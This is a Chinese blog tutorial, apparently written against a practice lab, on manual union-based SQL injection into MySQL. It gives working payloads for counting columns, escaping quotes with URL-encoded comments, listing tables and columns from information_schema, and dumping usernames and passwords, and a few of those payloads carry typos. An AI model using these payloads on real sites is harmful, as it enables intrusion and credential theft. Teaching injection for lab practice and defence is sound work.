SQL注入流程

最新推荐文章于 2024-05-31 21:47:42 发布
最新推荐文章于 2024-05-31 21:47:42 发布
阅读量1k 收藏 14
点赞数 19
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64395221/article/details/139011337
版权

目录

首先了解以下MySQL常用函数:

一、联合查询

1.order by

2. 直接使用联合查询,依次在后面加列数

二、怎么逃逸单引号:

 1.可以再加一个单引号;

2.注释;(--空格、#、/**/);

(1)#号:

(2)--空格:

三、获取表名

四、得到表名查询列名

五、查询账号及密码

首先了解以下MySQL常用函数:

1.database()  查询当前数据库;

 2.user()  查看当前用户;

3.version()   查看当前数据库的版本;

 

 4.length()  查看长度;

5.substr()  截取数据库的某个字段(不能从0开始);

例:(1,2)从第一位开始截取两个字符

 

 6.substring()  与substr相同;

7.ascii()   将英文字符转为asc码;

例:拿上面截取到的字符

知道这些函数对我们SQL注入有很大的帮助。

SQL注入流程:

1.判断注入点

2.判断注入点类型

3.判断数据库类型

4.获取数据库数据,提权

前两步在上一篇博客已经提到了,那么接下来是如何判断数据库的类型:

判断数据库的类型,主要是通过各种数据库特有的函数,字符串处理,注释等来排除、猜测数据库的类型。

那么常见数据库有:Oracle、MySQL、SQL Server、Access、Postgresql、mongodb等

上三步都完成后咱们来看看第四步该如何完成:

例:通过sql注入获取管理员的账号及密码,数据库类型为mysql且假设无过滤。

一、联合查询

要知道数据库信息,我们可以通过联合查询找到我们想要的信息,但是联合查询需要前后两个表的列数相同,那我们怎么去判断表的列数呢:

1.order by

mysql可以通过order by +  列名 进行排序,那么可以通过order by知道被查询的表有多少列;

select * from users order by (1~n)
用1~n来代替第一列到第n列的列名,当列数不对时,会出现报错,那么此时就可以确定该表的列数为报错前的列数

如下图,当 列数不对时,会报出以下错误

id=1' order by 4--+   --+用于逃逸单引号

2. 直接使用联合查询,依次在后面加列数
select * from users union select 1,2,~,n;  
该方法是当列数正确是得出结果,不正确会提示列数不同

id=1' union sselect 1,2--+

通过上面的方法,我们已经知道列数了,但是上述方法都需要我们逃逸出单引号,如果没有逃逸出来,mysql会将单引号内当成一个整体,就不会执行后面的命令了。 

二、怎么逃逸单引号:

需要对原有单引号进行闭合----再加一个单引号:

但是这样的话,会多出一个单引号,出现语法报错

解决方法如下:

 1.可以再加一个单引号;

id=1''

2.注释;(--空格、#、/**/);
(1)#号:

id=1'#

此时通过#号注释还是出现了报错:因为url地址栏有特殊的编码方式(urlcode),它会将一些不符合它编码规则的全部进行编码

url编码规则:求asc码,转16进制,在前面加%;

例:单引号---%27

同理#号被编码为%23---此时成功  

(2)--空格:

同理空格也需要编码---   %20 (--+也可以;因为在RFC-1738标准中,空格在url编码以后为+号)

此时咱们已经知道表的列数了,那么我们可以进行联合查询 

id=1' union select 1,database(),3--+   通过刚刚的函数将2替换得出当前数据库

 但是并没有获取到数据,因为当id=1时,查询正常,但只取出了第一列数据;如果想让第二列被取出来只有第一列查不出来数据,才会将第二列取出来;要想第一列取不出数据---要么id特别大,要么id是-1;

 id=-1' union select 1,database(),3--+   获取到当前数据库

 

三、获取表名

MySQL中官方提供以下几个库:information_schema、mysql、performance_schema、sys;可以从这几个库里找

一般是在information_schema中寻找 

 通过限制获取对应数据库的表名

 在url栏中查询(查询成功,但没有取到想要的表名)

id=-1‘ union select  1,2,table_name from information_schema.tables where table_schema='security'--+

 可以通过limit(0,1、1,1、2,1、3,1......) 

id=-1‘ union select  1,2,table_name from information_schema.tables where table_schema='security' limit 1,1--+

可以通过group_concat()将查询的表名转为一列---得到需要的表名,还能起到连接作用

id=-1‘ union select  1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

四、得到表名查询列名

id=-1' union select 1,2,group_concat(column_name) from information_schema.column where table_schemas='security' and table_name='users'--+

五、查询账号及密码

表名、列名都已经被我们知道了,那么就可以获取到管理员的账号及密码了

id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+

 此时SQL注入完成。

拾荒的狸猫
关注
  • 19
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入知识点总结.pdf
02-11
根据网上视频课程学习总结知识点,文档结构分为SQL注入概述、SQL注入分类、SQL注入流程SQL注入方法、自动化注入做出总结 整理为文档 可以方便查阅
简单的SQL注入流程
m0_58038651的博客
12-15 2661
Information_schema.tables (包含所有的库的表名) Information_schema.schemata: (包含所有的数据库的库名) ...
Sql注入流程
weixin_45837672的博客
07-20 2594
Sql注入本质是把用户输入都数据当做代码来执行,最终达到欺骗服务器执行恶意的SQL命令。
SQL注入获取MySQL用户表密码
老洋
01-03 736
用 group by 验证(字段个数)使用二分法。
Access和SQLSever注入
05-07
Access和SQLSever注入,各位可以参考看看,里面的记录的流程
sql注入漏洞
03-24
:简要介绍了SQL注入攻击的原理,对SQL注入攻击方式进行了分析,总结了SQL注入攻 击的流程。根据SQL注入攻击的基本原理以及入侵前和入侵后的检测方法不同,提出了SQL注 入攻击检测的方法,并在此基础...
计算机病毒与防护:SQL注入漏洞的利用.ppt
06-10
下载地址:/sqlmapproject/sqlmap/ 官网地址:/ SQLmap的常见参数使用 SQLmap使用示例 基本的注入流程 使用示例-使用Sqlmap获取DVWA数据 使用示例-使用Sqlmap获取DVWA数据 使用示例-使用Sqlmap获取DVWA数据 (3)...
BaizeSec#bylibrary#安装流程中存在SQL注入1
07-25
1.检测是否生成了InstallLock.txt文件 2.执行sql语句 1.根据源码可知,我们首先需要删除安装目录下的installLock.txt文件(如果
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 368
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
lxcw_sir的博客
05-29 356
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
PostgreSQL常用插件
PGCCC的博客
05-29 526
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
postgressql——Tuple学习(2)
Re_view的博客
05-27 277
postgressql——Tuple学习(2)
PostgreSQL发展史
PGCCC的博客
05-28 931
PostgreSQL 的发展史反映了其从学术研究项目到全球领先的开源数据库系统的演变过程。通过不断的创新和社区支持,PostgreSQL 已经成为一个功能强大、性能优越的数据库管理系统,广泛应用于各个行业的关键业务场景中。#postgresql培训。
家庭理财管理系统(含源码+sql+视频导入教程+文档)
stopTheworld2022的博客
05-30 656
家庭理财管理系统拥有两种角色: 管理员:财务管理、财务类型管理、财务计划管理、家庭财务报表、用户管理、支出排行等 家庭成员:添加个人财务计划、查看家庭支出收入等信息
连接调优 ——OceanBase SQL 性能调优实践分享(2)
OceanBase分布式数据库的博客
05-31 360
本篇文章主要是分享关于使用OceanBase数据库时,连接(join)调优的实践和心得。
掌握 NestJS 10.x:NestJS 结合 PostgreSQL 使用详解
_midnight的博客
05-31 205
本文详细介绍了如何在 NestJS 项目中集成和使用 PostgreSQL 数据库。涵盖了安装依赖、配置 TypeORM、创建实体、定义服务和控制器以及运行应用的步骤。通过清晰的步骤和示例,帮助开发者快速上手并构建高效的全栈应用。
sql server2022安装教程
没有黑科技
05-29 790
1. 引言 - 1.1 版本介绍 - 1.2 本教程目标 2. 系统要求 - 2.1 操作系统要求 - 2.2 硬件要求 - 2.3 软件要求 3. 下载SQL Server 2022 - 3.1 访问官方下载页面 - 3.2 选择版本 - 3.3 下载步骤 4. 安装前的准备 - 4.1 检查更新 - 4.2 备份现有数据 - 4.3 确保足够的权限 5. 开始安装 - 5.1 启动安装程序 - 5.2 选择安装类型 -
SQL—DQL之执行顺序(基础)
最新发布
m0_74363339的博客
05-31 180
这篇博客是SQL分类中DQL(数据查询语言)的基础语法块的最后的内容,主要讲到了DQL语句在执行的时候的编写顺序和执行顺序......
常见SQL语法整理中
qq_29950673的博客
05-29 152
排序order by 字段 倒序/正序(desc/asc)排序时默认是正序所有acs可以不写,排序的语句要写在查询条件后面。select 别名.表字段 from 表名 别名 where 条件。
PentesterLab靶场sql注入流程
07-27
PentesterLab靶场的SQL注入流程可以按照以下步骤进行: 1. 首先,我们需要找到一个存在SQL注入漏洞的目标网站。可以使用工具或手动查找目标网站。 2. 一旦找到目标网站,我们可以使用不同的注入技术进行测试。在引用\[1\]和\[2\]中提供的案例中,可以尝试使用报错注入和联合查询注入。 3. 对于报错注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以触发错误并获取数据库信息。例如,在引用\[1\]中提供的案例中,我们可以尝试使用updatexml函数来获取数据库名称。 4. 对于联合查询注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以执行额外的查询并获取数据库信息。例如,在引用\[2\]中提供的案例中,我们可以尝试使用UNION SELECT语句来获取额外的数据列。 5. 如果我们成功地发现了SQL注入漏洞并获取了数据库信息,我们可以使用工具如sqlmap来自动化注入过程,以获取更多的数据库信息。 6. 最后,我们可以根据获取的数据库信息来进一步探索和利用漏洞,以达到我们的渗透测试目标。 请注意,进行SQL注入测试时,应遵循合法和道德的原则,并获得合法的授权。 #### 引用[.reference_title] - *1* *2* [PentesterLab靶场sql注入流程](https://blog.csdn.net/m0_37570494/article/details/122727777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [一次简单的SQL注入靶场练习](https://blog.csdn.net/lza20001103/article/details/125958035)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值